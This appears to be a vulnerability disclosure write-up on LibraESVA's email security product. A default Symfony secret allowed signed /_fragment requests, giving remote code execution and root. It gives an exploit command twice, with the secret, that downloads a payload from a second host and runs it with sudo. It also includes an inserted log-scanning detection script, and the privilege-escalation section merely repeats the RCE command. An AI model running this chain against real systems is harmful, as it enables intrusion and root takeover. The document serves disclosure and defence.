Under construction
TL;DR: Built on the Symfony framework, LibraESVA exposed the FragmentListener class with a well-known secret, leading to an authenticated RCE and a subsequent privilege escalation to root.
Let’s dive in:
LibraEsva
The company LibraESVA offers different solutions for managing the email ecosystem, from an Email Security program to a Load Balancer solution. Basically, those products are a suite for managing email, ranging from user management to built-in security features like antivirus scanning and phishing-prevention mechanisms.
Symfony RCE
Thanks to the excellent work by Ambionics Security on the Symfony framework, it was possible to focus my research on the FragmentListener class. Quoting from their blog:
> Essentially, when someone issues a request to /_fragment, this listener sets request attributes from given GET parameters. Since this allows to run arbitrary PHP code (more on this later), the request has to be signed using a HMAC value. This HMAC's secret cryptographic key is stored under a Symfony configuration value named secret.
Obviously we need to find this secret. Luckily this was a trivial task, as Symfony's well-documented docs give instructions on where to find this value. The secret is located in the /xxx/yyy/zzz.conf file, unchanged from the default value.
RCE
Using the previously mentioned technique, it was possible to remotely execute commands on the machine. This was achieved using Ambionics' Symfony exploit found on their GitHub page, building the command as follows:
```shell
./secret_fragment_exploit.py https://192.168.11.120/_fragment -i "https://192.168.11.120/_fragment" -s '36b1f1aadcc7602eeedcd83cc7d5510e9b2a9bd5' -m 1 -f shell_exec -p cmd:"cd /tmp/; wget -qO upgradescript --no-check-certificate https://192.168.11.124:8443/QE4aPZwlxtk; chmod 777 upgradescript; sudo ./upgradescript disown"
```
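From the defender's side, the same mechanism gives a clear detection signal: /_fragment should only ever be called by a trusted proxy (typically loopback), so any hit from elsewhere is worth an alert, and a 2xx reply to such a request means the HMAC check passed, i.e. the sender knows the secret. The following is an added example, not code from the original post or from Ambionics; the log lines are constructed, the combined log format and the loopback-only trusted list are assumptions to adapt to your deployment.

```python
import re
from ipaddress import ip_address, ip_network
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format), not from the original post:
# 1) external client accepted on /_fragment, 2) loopback proxy call,
# 3) external probe rejected with 403, 4) unrelated request.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Mar/2021:10:02:11 +0000] "GET /_fragment?_path=example%3Dvalue&_hash=AbCdEf HTTP/1.1" 200 512 "-" "python-requests/2.25"
127.0.0.1 - - [18/Mar/2021:10:02:12 +0000] "GET /_fragment?_path=header&_hash=XyZ HTTP/1.1" 200 90 "-" "Varnish"
198.51.100.9 - - [18/Mar/2021:10:02:40 +0000] "GET /_fragment?_path=test HTTP/1.1" 403 200 "-" "curl/7.68"
198.51.100.9 - - [18/Mar/2021:10:03:00 +0000] "GET /login HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Assumption: only loopback sources legitimately render fragments (ESI/SSI proxy on
# the same host). Replace with the proxies that are really trusted in your setup.
TRUSTED_SOURCES = [ip_network("127.0.0.0/8"), ip_network("::1/128")]


def is_trusted(ip: str, trusted=TRUSTED_SOURCES) -> bool:
    """True when the source address belongs to one of the trusted networks."""
    try:
        addr = ip_address(ip)
    except ValueError:  # malformed field, never treat it as trusted
        return False
    return any(addr in net for net in trusted)


def find_fragment_requests(log_text: str, trusted=TRUSTED_SOURCES) -> list:
    """Return one record per /_fragment request coming from an untrusted source."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path != "/_fragment" and not parts.path.startswith("/_fragment/"):
            continue
        if is_trusted(m["ip"], trusted):
            continue
        status = int(m["status"])
        hits.append({
            "ip": m["ip"],
            "ts": m["ts"],
            "status": status,
            "params": sorted(parse_qs(parts.query, keep_blank_values=True)),
            # 2xx means the signature verified: the caller knows the Symfony secret.
            "signature_accepted": 200 <= status < 300,
        })
    return hits
```

Run it over real access logs and page on any record with `signature_accepted` set; a run of 403s from one source is a probe for the secret and is worth a look too.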
Privilege Escalation
Located in /tmp there is a SUID script file, /tmp/upgradescript, which is writable and executable.
The complete command to trigger the chain is:
```shell
./secret_fragment_exploit.py https://192.168.11.120/_fragment -i "https://192.168.11.120/_fragment" -s '36b1f1aadcc7602eeedcd83cc7d5510e9b2a9bd5' -m 1 -f shell_exec -p cmd:"cd /tmp/; wget -qO upgradescript --no-check-certificate https://192.168.11.124:8443/QE4aPZwlxtk; chmod 777 upgradescript; sudo ./upgradescript disown"
```
Final thoughts
It is very important to run periodic vulnerability assessments and complete penetration tests on your own products, which it seems LibraEsva had not done. When developing a product based upon a framework, it is important to keep in mind that the framework itself may not be secure, which could lower the security of the overall project. Nonetheless, LibraEsva were very quick in triaging and fixing the bug.
Disclosure Timeline
| Date | Description |
|---|---|
| 18-03-2021 | LibraEsva's developer team informed about the vulnerability |
| 07-04-2021 | Fix released with product version 4.9.5 |
| 27-07-2021 | Public release |